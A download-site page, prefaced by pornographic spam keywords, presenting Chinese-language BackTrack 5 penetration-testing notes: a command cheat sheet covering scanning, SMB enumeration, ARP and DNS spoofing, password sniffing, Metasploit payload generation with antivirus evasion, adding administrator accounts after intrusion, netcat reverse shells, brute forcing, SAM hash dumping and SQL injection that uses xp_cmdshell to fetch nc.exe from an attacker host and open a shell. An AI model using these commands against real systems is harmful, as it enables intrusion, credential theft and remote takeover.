" />

久久无码高潮喷水抽搐,极品馒头泬19p,久久人人爽精品玩人妻av,精品国产成人国产在线视,精品视频一区二区三区在线观看

  • 紅軟基地:您身邊最放心的安全下載站!
您所在的位置:首頁 > 軟件 > 應(yīng)用軟件 > 教育學習 > BackTrack滲透測試筆記

BackTrack滲透測試筆記

軟件類型:
國產(chǎn)軟件
軟件語言:
簡體中文
軟件大。
6 MB
軟件授權(quán):
免費軟件
軟件評級:
4
更新時間:
2017-05-25
應(yīng)用平臺:
WinXP, Win7, WinAll
軟件簡介

BackTrack滲透測試筆記是一款BT5學習筆記,使用BT5的同學可以看看,不僅僅是用來破解WIFI,BT5還有更強大的功能。 體積小,但功能強大。界面非常清爽,簡單易操作。iSU紅軟基地

軟件功能

0x01.1 PTES 標準中的滲透測試階段iSU紅軟基地
0x01.1.1 前期交互階段iSU紅軟基地
0x01.1.2 情報搜集階段iSU紅軟基地
0x01.1.3 威脅建模階段iSU紅軟基地
0x01.1.4 漏洞分析階段iSU紅軟基地
0x01.1.5 滲透攻擊階段iSU紅軟基地
0x01.1.6 后滲透攻擊階段iSU紅軟基地
0x01.1.7 報告階段iSU紅軟基地
0x01.2 滲透測試類型iSU紅軟基地
0x01.2.1 白盒測試iSU紅軟基地
0x01.2.2 黑盒測試iSU紅軟基地
0x01.3 小結(jié)iSU紅軟基地
0x02 滲透環(huán)境搭建iSU紅軟基地
>iSU紅軟基地
0x03 常用信息收集iSU紅軟基地
0x03.1 被動信息收集iSU紅軟基地
0x03.2 主動信息收集iSU紅軟基地
0x03.3 針對性掃描iSU紅軟基地
0x03.4 小結(jié)iSU紅軟基地
0x04 信息收集的附屬工作iSU紅軟基地
0x04.1 基本的漏洞掃描iSU紅軟基地
0x04.2 使用 Nessus 進行掃描iSU紅軟基地
0x04.3 專用漏洞掃描器iSU紅軟基地
0x05 社會工程學攻擊iSU紅軟基地
0x05.1 針對性的釣魚攻擊iSU紅軟基地
0x05.2 web 向量攻擊iSU紅軟基地
0x05.3 SET 的其他特性iSU紅軟基地
0x05.4 小結(jié)。iSU紅軟基地

軟件說明

ping 域名/ip 測試本機到遠端主機是否聯(lián)通。iSU紅軟基地
dig 域名/ip 查看域名解析的詳細信息。iSU紅軟基地
host -l 域名 dns服務(wù)器 傳輸zone。iSU紅軟基地
掃描iSU紅軟基地
nmap:iSU紅軟基地
-sS 半開掃描TCP和SYN掃描。iSU紅軟基地
-sT 完全TCP連接掃描。iSU紅軟基地
-sU UDP掃描iSU紅軟基地
-PS syn包探測(防火墻探測)iSU紅軟基地
-PA ack包探測(防火墻探測)iSU紅軟基地
-PN 不ping。iSU紅軟基地
-n 不dns解析。iSU紅軟基地
-A -O和-sV。iSU紅軟基地
-O 操作系統(tǒng)識別。iSU紅軟基地
-sV 服務(wù)版本信息(banner)iSU紅軟基地
-p 端口掃描。iSU紅軟基地
-T 設(shè)置時間級別(0-5)iSU紅軟基地
-iL 導入掃描結(jié)果。iSU紅軟基地
-oG 輸出掃描結(jié)果。iSU紅軟基地
操作系統(tǒng)識別:iSU紅軟基地
p0f -i eth0 -U -p 開啟混雜模式。iSU紅軟基地
xprobe2 ip|域名 檢測os。iSU紅軟基地
banner獲取:iSU紅軟基地
nc ip port 檢測端口是否打開。iSU紅軟基地
telnet ip port 檢測端口是否打開。iSU紅軟基地
wget ip 下載主頁。iSU紅軟基地
cat index.html | more 顯示主頁代碼。iSU紅軟基地
q 退出。iSU紅軟基地
windows枚舉iSU紅軟基地
nmap -sS -p 139,445 ip 掃描windows。iSU紅軟基地
cd /pentest/enumeration/smb-enumiSU紅軟基地
nbtscan -f targetIP 檢測netbios。iSU紅軟基地
smbgetserverinfo -i targetIP 掃描name,os,組。iSU紅軟基地
smbdumpusers -i targetIP 列出用戶。iSU紅軟基地
smbclient -L //targetIP 列出共享。iSU紅軟基地
使用windows:iSU紅軟基地
net use \\ip\ipc$ "" /u:"" 開啟空會話。iSU紅軟基地
net view \\ip 顯示共享信息。iSU紅軟基地
smbclient:iSU紅軟基地
smbclient -L hostName -I targetIP 枚舉共享。iSU紅軟基地
smbclient -L hostName/share -U "" 用空用戶連接。iSU紅軟基地
smbclient -L hostName -I targetIP -U admin普通用戶連接。iSU紅軟基地
rpcclient:iSU紅軟基地
rpcclient targetIP -U ""打開一個空會話。iSU紅軟基地
netshareenum 枚舉共享。iSU紅軟基地
enumdomusers 枚舉用戶。iSU紅軟基地
lsaenumsid 枚舉域SID。iSU紅軟基地
queryuser RID 查詢用戶信息。iSU紅軟基地
createdomuser 創(chuàng)建用戶訪問。iSU紅軟基地
ARP欺騙:iSU紅軟基地
ettercap:iSU紅軟基地
nano /usr/local/etc/etter.conf配置文件iSU紅軟基地
Sniff > Unified sniffing > Network interface: eth0 > OK 設(shè)置抓包的網(wǎng)卡iSU紅軟基地
Hosts > Scan for hosts (do this two times)掃描網(wǎng)段的主機iSU紅軟基地
Hosts > Hosts list 顯示主機列表iSU紅軟基地
Select the default gateway > Add to Target 1 添加主機iSU紅軟基地
Select the target > Add to Target 2 添加主機iSU紅軟基地
Mitm > Arp poisoning > Sniff remote connections > OK 設(shè)置ARP攻擊iSU紅軟基地
Start > Start sniffing 開始攻擊iSU紅軟基地
dsniff -i eth0 監(jiān)聽網(wǎng)卡竊聽登錄用戶密碼iSU紅軟基地
urlsnarf -i eth0 嗅探http請求iSU紅軟基地
msgsnarf -i eth0 嗅探聊天軟件的聊天內(nèi)容iSU紅軟基地
driftnet -i eth0 網(wǎng)絡(luò)管理嗅探圖片,音頻。iSU紅軟基地
dns欺騙:iSU紅軟基地
nano /usr/local/share/ettercap/etter.dns編輯配置文件iSU紅軟基地
Plugins > Manage the plugins > dns_spoof 設(shè)置dns欺騙iSU紅軟基地
Mitm > Arp poisoning > Sniff remote connections > OK 設(shè)置ARPiSU紅軟基地
Start > Start sniffing 開始攻擊iSU紅軟基地
Exploits漏洞利用:iSU紅軟基地
cd /pentest/exploits/exploit-db 進入目錄iSU紅軟基地
cat sploitlist.txt | grep -i [exploit] 查詢需要的漏洞iSU紅軟基地
cat exploit | grep "#include"檢查運行環(huán)境iSU紅軟基地
cat sploitlist.txt | grep -i exploit | cut -d " " -f1 | xargs grep sys | cut -d ":" -f1 | sort -u只保留可以在linux下運行的代碼iSU紅軟基地
Metasploit:iSU紅軟基地
svn update 升級iSU紅軟基地
./msfweb Web接口127.0.0.1:55555。.iSU紅軟基地
./msfconsole 字符下的Console。iSU紅軟基地
help 幫助iSU紅軟基地
show <option> 顯示選項iSU紅軟基地
search <name> 搜索名字iSU紅軟基地
use <exploit name> 使用漏洞iSU紅軟基地
show options 顯示選項iSU紅軟基地
set <OPTION NAME> <option> 設(shè)置選項iSU紅軟基地
show payloads 顯示裝置iSU紅軟基地
set PAYLOAD <payload name> 設(shè)置裝置iSU紅軟基地
show options 顯示選項iSU紅軟基地
set <OPTION NAME> <option> 設(shè)置選項iSU紅軟基地
show targets 顯示目標(os版本)iSU紅軟基地
set TARGET <target number> 設(shè)置目標版本iSU紅軟基地
exploit 開始漏洞攻擊iSU紅軟基地
sessions -l 列出會話iSU紅軟基地
sessions -i <ID> 選擇會話iSU紅軟基地
sessions -k <ID> 結(jié)束會話iSU紅軟基地
<ctrl> z 把會話放到后臺iSU紅軟基地
<ctrl> c 結(jié)束會話iSU紅軟基地
jobs 列出漏洞運行工作iSU紅軟基地
jobs -K 結(jié)束一個漏洞運行工作iSU紅軟基地
show auxiliary 顯示輔助模塊iSU紅軟基地
use <auxiliary name> 使用輔助模塊iSU紅軟基地
set <OPTION NAME> <option> 設(shè)置選項iSU紅軟基地
run 運行模塊iSU紅軟基地
scanner/smb/version 掃描系統(tǒng)版本iSU紅軟基地
scanner/mssql/mssql_ping 測試mssql是否在線iSU紅軟基地
scanner/mssql/mssql_login 測試登錄(暴力或字典)iSU紅軟基地
Attacker behind firewall: bind shell正向iSU紅軟基地
Target behind firewall: reverse shell反向iSU紅軟基地
Meterpreter銜接不懂dos的可以用這個:iSU紅軟基地
db_import_nessus_nbe 加載nessus的掃描結(jié)果iSU紅軟基地
db_import_nmap_xml 加載nmap的掃描結(jié)果iSU紅軟基地
自動化攻擊流程:iSU紅軟基地
cd /pentest/exploit/framework3iSU紅軟基地
./msfconsoleiSU紅軟基地
load db_sqlite3iSU紅軟基地
db_destroy pentestiSU紅軟基地
db_create pentestiSU紅軟基地
db_nmap targetIPiSU紅軟基地
db_hostsiSU紅軟基地
db_servicesiSU紅軟基地
db_autopwn -t -p -eiSU紅軟基地
字符接口攻擊流程:iSU紅軟基地
./msfcli | grep -i <name>iSU紅軟基地
./msfcli <exploit or auxiliary> SiSU紅軟基地
./msfcli <exploit name> <OPTION NAME>=<option> PAYLOAD=<payload name> EiSU紅軟基地
做木馬后門等:iSU紅軟基地
./msfpayload <payload> <variable=value> <output type>iSU紅軟基地
S summary and options of payloadiSU紅軟基地
C C languageiSU紅軟基地
P PerliSU紅軟基地
y RubyiSU紅軟基地
R Raw, allows payload to be piped into msfencode and other toolsiSU紅軟基地
J JavaScriptiSU紅軟基地
X Windows executableiSU紅軟基地
./msfpayload windows/shell/reverse_tcp LHOST=10.1.1.1 CiSU紅軟基地
./msfpayload windows/meterpreter/reverse_tcp LHOST=10.1.1.1 LPORT=4444 X > evil.exeiSU紅軟基地
編碼處理就是做免殺:iSU紅軟基地
./msfencode <options> <variable=value>iSU紅軟基地
./msfpayload linux_ia32_bind LPORT=4444 R | ./msfencode -b '\x00′ -liSU紅軟基地
./msfpayload linux_ia32_bind LPORT=4444 R | ./msfencode -b '\x00′ -e PexFnstenvMor -t ciSU紅軟基地
入侵后在windows下添加管理員用戶:iSU紅軟基地
hostname 查看主機名iSU紅軟基地
net users 查看用戶iSU紅軟基地
net user 用戶 密碼 /add 添加用戶iSU紅軟基地
net localgroup 查看工作組iSU紅軟基地
net localgroup administrators 查看管理員組iSU紅軟基地
net localgroup administrators x /add 將用戶加入管理員組iSU紅軟基地
TFTPiSU紅軟基地
cp /pentest/windows-binaries/tools/nc.exe /tmp/傳遞到tftp上iSU紅軟基地
tftp -i 10.1.1.2 GET nc.exe下載iSU紅軟基地
netcat瑞士軍刀iSU紅軟基地
attacker: 10.1.1.1iSU紅軟基地
target: 10.1.1.2iSU紅軟基地
nc -v -z 10.1.1.2 1-1024 端口掃描iSU紅軟基地
target: nc -lvp 4444 聊天設(shè)置(服務(wù))iSU紅軟基地
attacker: nc -v 10.1.1.2 4444 聊天設(shè)置(客戶)iSU紅軟基地
target: nc -lvp 4444 > output.txt傳輸文件(接受)iSU紅軟基地
attacker: nc -v 10.1.1.2 4444 < test.txt傳輸文件(發(fā)送)iSU紅軟基地
target: nc -lvp 4444 -e cmd.exe Bind shell。iSU紅軟基地
attacker: nc -v 10.1.1.2 4444iSU紅軟基地
target:nc -lvp 4444 Reverse shell。iSU紅軟基地
attacker:nc -v 10.1.1.2 4444 -e /bin/bashiSU紅軟基地
密碼iSU紅軟基地
字典zcat /pentest/password/dictionaries/wordlist.txt.Z > wordsiSU紅軟基地
cat words | wc -l顯示個數(shù)(30多萬個)iSU紅軟基地
暴力:iSU紅軟基地
hydra -l ftp -P words -v targetIP ftp 攻擊ftp。iSU紅軟基地
hydra -l muts -P words -v targetIP pop3 攻擊pop3iSU紅軟基地
hydra -P words -v targetIP snmp 攻擊snmpiSU紅軟基地
攻擊microsof VPNiSU紅軟基地
nmap -p 1723 targetIPiSU紅軟基地
dos2unix wordsiSU紅軟基地
cat words | thc-pptp-bruter targetIPiSU紅軟基地
WYD:iSU紅軟基地
wget -r target.com –accept=pdf 下載pdf文檔iSU紅軟基地
wyd.pl -o output.txt .target.com/iSU紅軟基地
cat output.txt | moreiSU紅軟基地
SAM文件(windows下的密碼文件):iSU紅軟基地
%SYSTEMROOT%/system32/configiSU紅軟基地
%SYSTEMROOT%/repairiSU紅軟基地
備份windows的hash文件:iSU紅軟基地
./msfcli exploit/windows/dcerpc/ms03_026_dcom RHOST=targetIP PAYLOAD=windows/meterpreter/bind_tcp EiSU紅軟基地
meterpreter > upload -r /tmp/pwdump6 c:\\windows\\system32\\iSU紅軟基地
meterpreter > execute -f cmd -ciSU紅軟基地
meterpreter > interact xiSU紅軟基地
C:\WINDOWS\system32> pwdump \\127.0.0.1iSU紅軟基地
john破解密碼:iSU紅軟基地
cp hash.txt /pentest/password/john-1.7.2/run/iSU紅軟基地
cd /pentest/password/john-1.7.2/run/iSU紅軟基地
./john hash.txtiSU紅軟基地
彩虹表:iSU紅軟基地
rcrack *.rt -f hash.txtiSU紅軟基地
本地修改密碼:iSU紅軟基地
mountiSU紅軟基地
umount /mnt/hda1iSU紅軟基地
modprobe fuseiSU紅軟基地
ntfsmount /dev/hda1 /mnt/hda1iSU紅軟基地
mountiSU紅軟基地
ls -l /mnt/hda1 掛載c盤iSU紅軟基地
bkhive /mnt/sda1/WINDOWS/system32/config/system system.txtiSU紅軟基地
samdump2 /mnt/sda1/WINDOWS/system32/config/sam system.txt > hash.txt 備份sam文件iSU紅軟基地
直接修改sam文件:iSU紅軟基地
chntpw /mnt/sda1/WINDOWS/system32/config/SAMiSU紅軟基地
Blank the password. *iSU紅軟基地
Do you really wish to change it? yiSU紅軟基地
Write hive files? yiSU紅軟基地
unmount /mnt/sda1iSU紅軟基地
rebootiSU紅軟基地
SQL 注入iSU紅軟基地
nmap -sS -p 1521 targetIP 掃描oracleiSU紅軟基地
nmap -sS -p T:1433,U:1434 targetIP 掃描mssqliSU紅軟基地
' or 1=1–驗證旁路iSU紅軟基地
列舉表名:iSU紅軟基地
' having 1=1–iSU紅軟基地
' group by table having 1=1–iSU紅軟基地
' group by table, table2 having 1=1–iSU紅軟基地
' group by table, table2, table3 having 1=1–iSU紅軟基地
列舉列類型:iSU紅軟基地
union select sum(column) from table –iSU紅軟基地
union select sum(column2) from table –iSU紅軟基地
添加數(shù)據(jù):iSU紅軟基地
' ; insert into table values('value','value2′,'value3′)–iSU紅軟基地
MSSQL存儲程序:iSU紅軟基地
輸出數(shù)據(jù)庫中備案信息到一個html文件,您可以查看與一個瀏覽器。iSU紅軟基地
' ; exec sp_makewebtask "c:\Inetpub\wwwroot\test.html", "select * from table" ; —.target.com/test.htmliSU紅軟基地
運行ipconfig在瀏覽器查看信息。iSU紅軟基地
' or 1=1; exec master..xp_cmdshell ' "ipconfig" > c:\Inetpub\wwwroot\test.txt' .target.com/test.txtiSU紅軟基地
上傳后門。iSU紅軟基地
' or 1=1; exec master..xp_cmdshell ' "tftp -i attackIP GET nc.exe && nc.exe attackIP 53 -e cmd.exe' ; –iSU紅軟基地
攻擊者: nc -lvp 53iSU紅軟基地
spreadfold。iSU紅軟基地

相關(guān)介紹

bt5,全稱Back Track five,是繼bt3,bt4之后的最新版。這是一個linux環(huán)境的便攜系統(tǒng),可以放到U盤或者硬盤中啟動,對本身硬盤沒有影響,無需在本地安裝。內(nèi)置大量的網(wǎng)絡(luò)安全檢測工具以及黑客破解軟件等。iSU紅軟基地

軟件截圖

BackTrack滲透測試筆記iSU紅軟基地

軟件下載地址
BackTrack滲透測試筆記
軟件推薦
下載排行

精品軟件

熱門關(guān)鍵詞

熱門軟件推薦